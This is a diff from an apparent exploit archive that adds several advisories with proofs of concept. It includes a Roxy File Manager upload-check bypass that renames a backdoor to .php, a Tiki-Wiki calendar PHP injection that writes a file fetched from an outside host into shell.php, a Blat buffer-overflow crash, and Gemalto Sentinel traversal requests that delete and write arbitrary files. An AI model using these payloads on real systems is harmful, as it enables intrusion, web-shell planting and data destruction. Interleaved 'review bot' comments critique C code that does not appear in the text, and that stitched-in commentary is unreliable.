http://www.roxyfileman.com/download.php?f=1.4.4-php +# Version: 1.4.4 +# Tested on: PHP + +1. Description + +The Roxy File Manager has a configuration setting named FORBIDDEN_UPLOADS, +which keeps a list of forbidden file extensions that the application will +not allow to be uploaded. This configuration setting is also checked when +renaming an existing file to a new file extension. + +It is possible to bypass this check and rename already uploaded files to +any extension, using the move function as this function does not perform +any checks. + + +2. Proof of Concept + +http://host/fileman/php/movefile.php?f=/Upload/backdoor.jpg&n=/Upload/backdoor.php + + +The renamed file will now be accessible at http://host/Upload/backdoor.php 
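Review bot: In xcode the success check after the allocation is wrong on the POSIX side: mmap reports failure with MAP_FAILED, not NULL, so `if (bin!=NULL)` passes on a failed mapping and the following memcpy writes through an invalid pointer; add `if (bin==MAP_FAILED) bin=NULL;` at the end of the `#else` branch so both platforms reach the check with the same convention. In main, `len` is a size_t but is printed with `%i` in the length-error message; `%zu` is the matching conversion. bin2file writes sh_cmd.bin into the current directory on every run and ignores a failed fopen, which is acceptable for a best-effort dump but deserves a comment such as `/* best-effort dump to CWD; a failed fopen is silently ignored */`.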
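Review bot: The advisory identifies the missing check in the move path but gives no remediation or fixed version; a closing line stating that the move handler must apply the same FORBIDDEN_UPLOADS extension check as the upload and rename handlers, and whether a fixed release existed at publication, would let defenders act on it. The "Tested on: PHP" line is too vague to scope the finding; the PHP and web-server versions used would pin it down.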
diff --git a/platforms/php/webapps/39964.html b/platforms/php/webapps/39964.html new file mode 100755 index 000000000..243f1cdee --- /dev/null +++ b/platforms/php/webapps/39964.html @@ -0,0 +1,47 @@ + + + + +
+ + + + + + + +
+ + + + + + diff --git a/platforms/php/webapps/39965.txt b/platforms/php/webapps/39965.txt new file mode 100755 index 000000000..ddc34f156 --- /dev/null +++ b/platforms/php/webapps/39965.txt @@ -0,0 +1,26 @@ +# Exploit Title: Tiki-Calendar-RCE +# Google Dork: inurl:tiki-calendar.php +# Date: 2015-12-16 +# Exploit Author: Dany Ouellet +# Vendor Homepage: https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki +# Software Link: https://tiki.org/Download +# Version: ALL supported versions of Tiki (14.2, 12.5 LTS, 9.11 LTS and 6.15)(if not patched) +# Tested on: Windows and Linux + +Hi, I recently discover an important flaw in CMS Tiki-Wiki. I reported the +vulnerability directly to vendor and a patch is now avalaible. So I release +the exploit. ;) + +PoC: + +Validate the vulnerability: + +http://victimesite/tiki-calendar.php?viewmode=';print(TikiWikiRCE);$a=' + +Write or deface the site: + +http://victimesite/tiki-calendar.php?viewmode=%27;%20$z=fopen(%22index6.php%22,%27w%27);%20fwrite($z,(%22TikiWikiRCE%22));fclose($z);$a=%27 + +Execute a php shellcode: + +http://victimesite/tiki-calendar.php?viewmode=%27;%20$z=fopen%28%22shell.php%22,%27w%27%29;fwrite%28$z,file_get_contents%28%22http://hackersite.com/r57.txt%22%29%29;fclose%28$z%29;%27 diff --git a/platforms/windows/dos/39966.txt b/platforms/windows/dos/39966.txt new file mode 100755 index 000000000..5091517d5 --- /dev/null +++ b/platforms/windows/dos/39966.txt 
@@ -0,0 +1,48 @@
+1. Vulnerable Product Version:
+
+*Blat v3.2.14*
+Link: blat.net
+
+
+2. Vulnerability Information
+
+Impact: Attacker may gain administrative access / can perform a DOS
+
+Remotely Exploitable: No
+
+Locally Exploitable: May be possible
+
+
+3. Product Details
+
+An open source Windows (32 & 64 bit) command line SMTP mailer. We can use
+it to automatically email logs, the contents of a html FORM, or whatever
+else you need to send.
+
+Since blat is lightweight, user friendly and simple (but awesome) many
+vendors incorporates it with their Softwares. I have seen blat in many
+commercial Softwares which use it for sending mails to its customers. And
+Blat is awesome.
+
+
+4. Vulnerability Description
+
+The Overflow vulnerability lies in the profile option parameter “–p”. When
+a string of 236 bytes is send to blat, the EBP and EIP register gets
+overwritten by the user input.
+
+Reproduction:
+
+* blat.exe crashes with this command blat.exe –install
+smtp.my.tld 127.0.0.1 –p <”A”*234+”B”*2>*
+
+
+Feeding this command overwrites EBP with 0x00410041 and EIP with 0x00420042
+(Please refer to the attached screen shot)
+
+
+5. Links
+
+https://sourceforge.net/projects/blat/
+
+https://groups.yahoo.com/neo/groups/blat/conversations/messages/13759
diff --git a/platforms/windows/webapps/39968.txt b/platforms/windows/webapps/39968.txt
new file mode 100755
index 000000000..453134337
--- /dev/null
+++ b/platforms/windows/webapps/39968.txt
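Review bot: The stated impact ("may gain administrative access") is not supported by the reproduction, which shows a local crash with EBP and EIP overwritten by a command-line argument supplied by the invoking user; with "Remotely Exploitable: No" and no privilege boundary shown, the impact line should be narrowed to what is demonstrated (local crash, potential code execution at the caller's own privilege). The text refers to an "attached screen shot" that is not part of this file; the register values already quoted make the reference unnecessary, so drop it or inline the remaining details. Whether a fixed version exists, or that none was known at publication, is missing and is what a defender needs to decide on mitigation.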
@@ -0,0 +1,99 @@ + +Gemalto Sentinel License Manager 18.0.1 Directory Traversal Vulnerability + + +Vendor: Gemalto NV | SafeNet, Inc +Product web page: http://www.gemalto.com | http://www.safenet-inc.com +Affected version: 18.0.1.55505 + +Summary: The Sentinel License Manager enforces and manages licensing +in multi-user environment. It keeps track of all the licenses and +handles requests from network users who want to run your application, +granting authorization to the requesters to allow them to run the +application, and denying requests when all licenses are in use. It is +an integral component of the network licensing schemes that can be +implemented with Sentinel RMS, namely server-locked licenses, site +licenses and commuter licenses. + +Desc: Input passed via the 'alpremove' and 'check_in_file' parameters +is not properly verified in '/_int_/action.html' and '/_int_/checkin_file.html' +before being used to delete and create files. This can be exploited to +arbitrarily delete sensitive information on a system and/or write files +via directory traversal attacks. + +Tested on: Microsoft Windows 7 Ultimate SP1 (EN) + HASP LM/18.00 (web server) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5330 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5330.php + + +26.04.2016 + +-- + + + +1. 
Unauthenticated file removal using POST or GET: +-------------------------------------------------- +1st request renames the file to meaning_of_life.txt.bak +2nd request removes the file entirely from C:\ +-------------------------------------------------------- + +POST /_int_/action.html HTTP/1.1 +Host: localhost:1947 + +alpremove=/../../../../../../../meaning_of_life.txt + +OR + +1st req: GET http://localhost:1947/_int_/action.html?alpremove=/../../../../../../../meaning_of_life.txt HTTP/1.1 +2nd req: GET http://localhost:1947/_int_/action.html?alpremove=/../../../../../../../meaning_of_life.txt HTTP/1.1 + + + +2. Unauthenticated file write: +------------------------------ +PoC that creates license file in C:\ +------------------------------------- + +POST /_int_/checkin_file.html HTTP/1.1 +Host: localhost:1947 +Content-Length: 770 +Cache-Control: max-age=0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Origin: http://localhost:1947 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVlbofFpDmUw9CugB +Referer: http://localhost:1947/_int_/checkin.html +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Cookie: hasplmlang=_int_ +Connection: close + +------WebKitFormBoundaryVlbofFpDmUw9CugB +Content-Disposition: form-data; name="check_in_file"; filename="\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\jxzp" +Content-Type: application/octet-stream + + + + + 18.0.1.55505 + LAB-ZSL + LAB-ZSL + + MXhJSWPdmwJr2iAIUgAGKBk/7N4U2GbJjLA6hGC1VHDvrsA2W+8e2ChuAFYgF6ZG + ttm6N6iupYkEEHzcQQrG1r0pIGBarRkAy0GR46nuTYFtm8iAMA5IBQoP82wKbLMl + gUKpUABvAmhFimCbrXumJpsOA8ApTjaU12zdm0LkvsgTAPECCFTau + + + + +------WebKitFormBoundaryVlbofFpDmUw9CugB-- +